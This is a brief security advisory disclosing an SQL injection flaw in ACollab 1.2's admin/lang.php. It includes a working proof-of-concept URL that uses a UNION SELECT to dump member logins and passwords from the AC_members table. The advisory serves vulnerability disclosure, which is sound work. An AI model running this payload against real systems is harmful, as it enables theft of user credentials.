Home
Consulting
Advisories
Software
Articles
Contact

ACollab 1.2 SQL Injection

Legacy Advisories

Description

An SQL injection vulnerability in ACollab 1.2 can be exploited to retrieve a list of usernames and passwords. Because the malicious string is stored in the session it may be necessary to refresh the page.

Proof Of Concept

http://localhost/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a


Copyright © 2018 AutoSec Tools LLC